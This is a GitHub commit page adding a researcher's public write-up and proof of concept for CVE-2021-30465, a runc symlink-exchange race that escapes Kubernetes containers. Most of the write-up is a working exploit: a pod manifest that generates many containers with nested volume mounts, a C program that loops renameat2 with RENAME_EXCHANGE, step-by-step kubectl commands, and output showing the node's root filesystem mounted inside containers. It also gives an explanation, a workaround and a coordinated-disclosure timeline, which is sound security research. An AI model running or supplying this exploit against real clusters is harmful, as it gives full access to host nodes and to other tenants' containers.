Skip to content

Commit a968466

Browse files
committed
runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)
1 parent 61b3492 commit a968466

File tree

2 files changed

+319
-0
lines changed

2 files changed

+319
-0
lines changed

README.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -7,3 +7,5 @@
77
* [Kubernetes MITM using LoadBalancer or ExternalIPs (CVE-2020-8554)](K8S_MITM_LoadBalancer_ExternalIPs/README.md)
88

99
* [Metadata service MITM allows root privilege escalation (EKS / GKE)](Metadata_MITM_root_EKS_GKE/README.md)
10+
11+
* [runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)](runc-symlink-CVE-2021-30465/README.md)

runc-symlink-CVE-2021-30465/README.md

Lines changed: 317 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,317 @@
1+
# runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)
2+
3+
It's November 2020 and I'm troubleshooting a container running on K8S that is doing tons of writes to the local disk.
4+
As those writes are just temporary states, I quickly add an `emptyDir tmpfs` volume at `/var/run`,
5+
open a ticket so that my devs make it permanent, and call it a day.
6+
7+
Some time later I notice, looking at `mount` output, that this new `tmpfs` is mounted at `/run` instead of `/var/run`,
8+
which I missed earlier but surprises me a bit. `/var/run` is a symlink to `../run` and
9+
after a quick test this is actually the normal Linux behavior to have mount follow symlinks,
10+
so I start wondering how does containerd/runc make sure the mounts are inside the container rootfs.
11+
12+
After following the code responsible for the mounts, I end up reading the comment of [`securejoin.SecureJoinVFS()`](https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57-L60):
13+
```
14+
// Note that the guarantees provided by this function only apply if the path
15+
// components in the returned string are not modified (in other words are not
16+
// replaced with symlinks on the filesystem) after this function has returned.
17+
// Such a symlink race is necessarily out-of-scope of SecureJoin.
18+
```
19+
As you read this you know that this race condition exists, the question is how to exploit it to escape to the K8S host.
20+
21+
## POC
22+
23+
When mounting a volume, runc trusts the source, and will let the kernel follow symlinks, but it doesn't trust the target argument and will use 'filepath-securejoin' library to resolve any symlink and ensure the resolved target stays inside the container root.
24+
As explained in [SecureJoinVFS() documentation](https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57-L60), using this function is only safe if you know that the checked file is not going to be replaced by a symlink, the problem is that we can replace it by a symlink.
25+
In K8S there is a trivial way to control the target, create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non existing images so they don't start right away.
26+
27+
Let's start with the POC first and the explanations after
28+
29+
1. Create our attack POD
30+
31+
```
32+
kubectl create -f - <<EOF
33+
apiVersion: v1
34+
kind: Pod
35+
metadata:
36+
name: attack
37+
spec:
38+
terminationGracePeriodSeconds: 1
39+
containers:
40+
- name: c1
41+
image: ubuntu:latest
42+
command: [ "/bin/sleep", "inf" ]
43+
env:
44+
- name: MY_POD_UID
45+
valueFrom:
46+
fieldRef:
47+
fieldPath: metadata.uid
48+
volumeMounts:
49+
- name: test1
50+
mountPath: /test1
51+
- name: test2
52+
mountPath: /test2
53+
$(for c in {2..20}; do
54+
cat <<EOC
55+
- name: c$c
56+
image: donotexists.com/do/not:exist
57+
command: [ "/bin/sleep", "inf" ]
58+
volumeMounts:
59+
- name: test1
60+
mountPath: /test1
61+
$(for m in {1..4}; do
62+
cat <<EOM
63+
- name: test2
64+
mountPath: /test1/mnt$m
65+
EOM
66+
done
67+
)
68+
- name: test2
69+
mountPath: /test1/zzz
70+
EOC
71+
done
72+
)
73+
volumes:
74+
- name: test1
75+
emptyDir:
76+
medium: "Memory"
77+
- name: test2
78+
emptyDir:
79+
medium: "Memory"
80+
EOF
81+
```
82+
83+
2. Compile race.c (simple binary running renameat2(dir,symlink,RENAME_EXCHANGE))
84+
85+
```
86+
cat > race.c <<'EOF'
87+
#define _GNU_SOURCE
88+
#include <fcntl.h>
89+
#include <stdio.h>
90+
#include <stdlib.h>
91+
#include <sys/types.h>
92+
#include <sys/stat.h>
93+
#include <unistd.h>
94+
#include <sys/syscall.h>
95+
96+
int main(int argc, char *argv[]) {
97+
if (argc != 4) {
98+
fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
99+
exit(EXIT_FAILURE);
100+
}
101+
char *name1 = argv[1];
102+
char *name2 = argv[2];
103+
char *linkdest = argv[3];
104+
105+
int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
106+
if (dirfd < 0) {
107+
perror("Error open CWD");
108+
exit(EXIT_FAILURE);
109+
}
110+
111+
if (mkdir(name1, 0755) < 0) {
112+
perror("mkdir failed");
113+
//do not exit
114+
}
115+
if (symlink(linkdest, name2) < 0) {
116+
perror("symlink failed");
117+
//do not exit
118+
}
119+
120+
while (1)
121+
{
122+
renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
123+
}
124+
}
125+
EOF
126+
127+
gcc race.c -O3 -o race
128+
```
129+
130+
3. Wait for the container c1 to start, upload the 'race' binary to it, and exec bash
131+
132+
```
133+
sleep 30 # wait for the first container to start
134+
kubectl cp race -c c1 attack:/test1/
135+
kubectl exec -ti pod/attack -c c1 -- bash
136+
```
137+
138+
you now have a shell in container c1
139+
140+
4. Create the following symlink (explanations later)
141+
142+
```
143+
ln -s / /test2/test2
144+
```
145+
146+
5. Launch 'race' multiple times to try to exploit this TOCTOU
147+
148+
```
149+
cd test1
150+
seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
151+
```
152+
153+
6. Now that everything is ready, in a second shell, update the images so that the other containers can start
154+
155+
```
156+
for c in {2..20}; do
157+
kubectl set image pod attack c$c=ubuntu:latest
158+
done
159+
```
160+
161+
7. Wait a bit and look at the results
162+
163+
```
164+
for c in {2..20}; do
165+
echo ~~ Container c$c ~~
166+
kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
167+
done
168+
```
169+
```
170+
~~ Container c2 ~~
171+
test2
172+
~~ Container c3 ~~
173+
test2
174+
~~ Container c4 ~~
175+
test2
176+
~~ Container c5 ~~
177+
bin dev home lib64 mnt postinst root sbin tmp var
178+
boot etc lib lost+found opt proc run sys usr
179+
~~ Container c6 ~~
180+
bin dev home lib64 mnt postinst root sbin tmp var
181+
boot etc lib lost+found opt proc run sys usr
182+
~~ Container c7 ~~
183+
error: unable to upgrade connection: container not found ("c7")
184+
~~ Container c8 ~~
185+
test2
186+
~~ Container c9 ~~
187+
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
188+
~~ Container c10 ~~
189+
test2
190+
~~ Container c11 ~~
191+
bin dev home lib64 mnt postinst root sbin tmp var
192+
boot etc lib lost+found opt proc run sys usr
193+
~~ Container c12 ~~
194+
test2
195+
~~ Container c13 ~~
196+
test2
197+
~~ Container c14 ~~
198+
test2
199+
~~ Container c15 ~~
200+
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
201+
~~ Container c16 ~~
202+
error: unable to upgrade connection: container not found ("c16")
203+
~~ Container c17 ~~
204+
error: unable to upgrade connection: container not found ("c17")
205+
~~ Container c18 ~~
206+
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
207+
~~ Container c19 ~~
208+
error: unable to upgrade connection: container not found ("c19")
209+
~~ Container c20 ~~
210+
test2
211+
```
212+
213+
On my first try running this POC, I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected.
214+
215+
Even without the ability to update images, we could use a fast registry for c1 and a slow registry or big container for c2+, we just need c1 to start 1sec before the others.
216+
217+
Tests were done on the following GKE cluster:
218+
```
219+
gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes
220+
```
221+
222+
K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs
223+
224+
## Explanations
225+
226+
I haven't dug too deep in the code and relied on strace to understand what was happening, and did the investigation about a month before finally having a working POC, so details are fuzzy, but here is my understanding:
227+
228+
1. K8S prepares all the volumes for the pod in `/var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME`
229+
(In my POC I'm using the fact that the path is known, but looking at `/proc/self/mountinfo` leaks all you need to find the path)
230+
231+
2. containerd prepares the rootfs at `/run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs`
232+
233+
3. runc calls `unshare(CLONE_NEWNS)` and sets the mount propagation to `MS_SLAVE`, thus preventing the following mount operations to affect other containers or the node directly
234+
235+
4. runc mount bind the K8S volumes
236+
237+
1. runc call `securejoin.SecureJoin()` to resolve the destination/target
238+
239+
2. runc call `mount()`
240+
241+
K8S doesn't give us control over the mount source, but we have full control over the target of the mount,
242+
so the trick is to mount a directory containing a symlink over K8S volumes path to have the next mount use this new source, and give us access to the node root filesystem.
243+
244+
From the node the filesystem look like this
245+
```
246+
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
247+
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
248+
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
249+
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
250+
...
251+
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /
252+
```
253+
254+
Our `race` binary is constantly swapping `mntX` and `mnt-tmpX`, when c2+ start, they do the following mounts
255+
```
256+
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)
257+
```
258+
which is equivalent to
259+
```
260+
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)
261+
```
262+
as the volume is bind mounted into the container rootfs
263+
264+
If we are lucky, when we call `SecureJoin()`, `mntX` is a directory, and when we call `mount()` `mntX` is now a symlink, and as `mount()` follow symlinks, this gives us
265+
```
266+
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)
267+
```
268+
269+
The filesystem now looks like
270+
```
271+
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /
272+
```
273+
274+
When we do the final mount
275+
```
276+
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
277+
```
278+
resolves to
279+
```
280+
mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
281+
```
282+
283+
And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :)
284+
285+
## Workaround
286+
287+
A possible workaround is to forbid mounting volumes in volumes, but as usual upgrading is recommended.
288+
289+
## Comments
290+
291+
This POC is far from being optimal and, as already stated, being able to update the image is not mandatory.
292+
293+
It took me some tries to have a working POC, at first I was trying to just mount the `tmpfs` volume to impact the host (`/root/.ssh`),
294+
but this doesn't work as the mounts are happening in a new mount namespace (and with the right mount propagation set), so the mounts are not visible in the host mount namespace.
295+
I then tried using a golang version for the race binary, 4 containers and 20 volumes, and this was always failing. I then switched to a C version (not sure it makes a difference), 19 containers and 4 mounts and this worked and gave me 6 containers out of 19 with the host mounted.
296+
297+
Even with newer syscalls like `openat2()` you still need to `mount(/proc/self/fd/X, /proc/self/fd/Y)` to be race free, not sure how useful having a new mount flag to fail when one of the params is a symlink would be, but this is a huge footgun.
298+
299+
This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc and was added later by K8S.
300+
You can sometimes read that K8S is multi-tenant, but you have to understand it as multiple trusted teams, not as giving API access to strangers.
301+
302+
On February 24th Google introduced GKE Autopilot, fully managed K8S Clusters with an emphasis on security and theoretically no access to the node, so after testing I also reported to them.
303+
304+
## Timeline
305+
306+
* 2020-11-??: Discover `SecureJoinVFS()` comment
307+
* 2020-12-26: Initial report to [email protected] (Merry Christmas :) )
308+
* 2020-12-27: Report acknowledgment
309+
* 2021-03-06: Report to Google for their new GKE Autopilot
310+
* 2021-04-07: Got added to discussions around the fix
311+
* 2021-04-08: Google bounty :) (to be donated to Handicap International)
312+
* 2021-05-19: End of embargo, advisory published on [GitHub](https://github.com/opencontainers/runc/security/advisories/GHSA-c3xm-pvg7-gh7r) and on [OSS-Security](https://www.openwall.com/lists/oss-security/2021/05/19/2)
313+
* 2021-05-30: Write-up + POC public
314+
315+
## Acknowledgments
316+
317+
Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.

0 commit comments

Comments
 (0)